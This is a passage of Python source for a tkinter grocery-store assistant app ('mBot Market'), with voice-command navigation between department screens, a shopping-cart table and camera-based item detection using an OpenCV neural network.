elif text.lower() == "health and beauty":
return "health and beauty"
elif text.lower() == "hygiene":
return "hygiene"
elif text.lower() == "meat":
return "meat"
elif text.lower() == "produce":
return "produce"
elif text.lower() == "seafood":
return "seafood"
else:
return "not found"
except sr.UnknownValueError:
return "inaudible"
except sr.RequestError as e:
return "error"
#----------------Interface-----------------------
nao = Scanner('nao')
nao.add_item('Banana', 15, 10)
nao.add_item('Apple', 30, 2)
nao.add_item('Celery', 10, 5)
nao.add_item('Garlic', 15, 5)
nao.add_item('Salt', 75, 1)
nao.add_item('Pepper', 85, 1)
class MainApp(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
container = tk.Frame(self)
container.pack(side = "top", fill = "both", expand = True)
container.grid_rowconfigure(0, weight=1)
container.grid_columnconfigure(0, weight=1)
self.frames = {}
for F in (Opening, ShoppingCart, Navigation, Bakery, Dairy, Deli, Dry_goods, Health_beauty, Hygiene, Meat, Produce, Seafood, Checkout):
frame = F(container, self)
self.frames[F] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame(Opening)
def show_frame(self, cont):
frame = self.frames[cont]
frame.tkraise()
class Opening(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="Welcome to mBot Market!", font=(font_name,15, 'bold'))
label.place(relx = 0.5, rely = 0.1, anchor = 'center')
button = tk.Button(self, text="Shopping cart", font=(font_name, 10), width=15, height=2, command=lambda: controller.show_frame(ShoppingCart))
button.place(relx = 0.2, rely = 0.25, anchor = 'center')
button = tk.Button(self, text="Navigation", font=(font_name, 10), width=15, height=2, command=lambda: controller.show_frame(Navigation))
button.place(relx = 0.5, rely = 0.25, anchor = 'center')
button = tk.Button(self, text="Check out", font=(font_name, 10), width=15, height=2, command=lambda: controller.show_frame(Checkout))
button.place(relx = 0.8, rely = 0.25, anchor = 'center')
icon = ImageTk.PhotoImage(Image.open("main_icon.png"))
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.65, anchor = 'center')
label.image = icon
class ShoppingCart(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="Your Shopping Cart", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
self.build_tree()
button = tk.Button(self, text="Add Item", font=(font_name, 10), width=20, height=1, command=lambda: self.add_item(controller))
button.place(relx = 0.31, rely = 0.9, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=20, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.69, rely = 0.9, anchor = 'center')
def build_tree(self):
shopping_list = nao.receipt()
cols = ('No.', 'Item', 'Qty.', 'Price')
table = ttk.Treeview(self, columns = cols, show = 'headings', height=15)
table.place(relx = 0.5, rely = 0.125, anchor = 'n')
for i in table.get_children():
table.delete(i)
table.column(cols[0], width = 30, anchor = 'center')
table.column(cols[1], width = 250, anchor = 'w')
table.column(cols[2], width = 30, anchor = 'center')
table.column(cols[3], width = 40, anchor = 'center')
table.heading(cols[0], text = cols[0])
table.heading(cols[1], text = cols[1], anchor = 'w')
table.heading(cols[2], text = cols[2])
table.heading(cols[3], text = cols[3])
for i in range(len(shopping_list)):
table.insert("", "end", values=(i+1, shopping_list[i]['item'], shopping_list[i]['quantity'], shopping_list[i]['price']))
def add_item(self, controller): #EDIT DISINI JDK BUAT ADD ITEM
#buka cam, add item pake popup kek or bebas
vs = PiVideoStream().start()
time.sleep(2.0)
while True:
image = vs.read()
#print(image);print(image.shape)
print('reading...')
image_height, image_width, _= image.shape
model.setInput(cv2.dnn.blobFromImage(image, size=(300, 300), swapRB=True))
output = model.forward()
added = False
for detection in output[0, 0, :, :]:
confidence = detection[2]
if confidence > .5:
class_id = detection[1]
class_name=id_class_name(class_id,classNames)
if class_name not in desired:
break
else:
print(class_name,'found! Adding to cart...')
nao.add_item(class_name,100,1)
added = True
cv2.imshow('image',image)
if added:
cv2.destroyAllWindows()
vs.stop()
break
self.build_tree()
controller.show_frame(ShoppingCart)
class Navigation(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("decorations/Base.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Bakery(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("decorations/Bakery.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Dairy(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("decorations/Dairy.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Deli(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("decorations/Deli.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Dry_goods(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("Dry decorations/Goods.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Health_beauty(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("Health decorations/Beauty.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Hygiene(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("decorations/Hygiene.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Meat(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("decorations/Meat.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Produce(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("decorations/Produce.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Seafood(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
label.place(relx = 0.5, rely = 0.075, anchor = 'center')
icon = Image.open("decorations/Seafood.jpg")
icon = icon.resize((467, 240), Image.ANTIALIAS)
icon = ImageTk.PhotoImage(icon)
label = tk.Label(self, image=icon)
label.place(relx = 0.5, rely = 0.38, anchor = 'center')
label.image = icon
button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1, command=lambda: self.goto(controller))
button.place(relx = 0.26, rely = 0.7, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.74, rely = 0.7, anchor = 'center')
def goto(self, controller):
input = voice_input()
if (input.lower() == "bakery"):
controller.show_frame(Bakery)
elif (input.lower() == "dairy"):
controller.show_frame(Dairy)
elif (input.lower() == "deli"):
controller.show_frame(Deli)
elif (input.lower() == "dry goods"):
controller.show_frame(Dry_goods)
elif (input.lower() == "health and beauty"):
controller.show_frame(Health_beauty)
elif (input.lower() == "hygiene"):
controller.show_frame(Hygiene)
elif (input.lower() == "meat"):
controller.show_frame(Meat)
elif (input.lower() == "produce"):
controller.show_frame(Produce)
elif (input.lower() == "seafood"):
controller.show_frame(Seafood)
elif (input.lower() == "not found"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, category not found :(", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "inaudible"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, inaudible voice. Please try again", font=(font_name, 10))
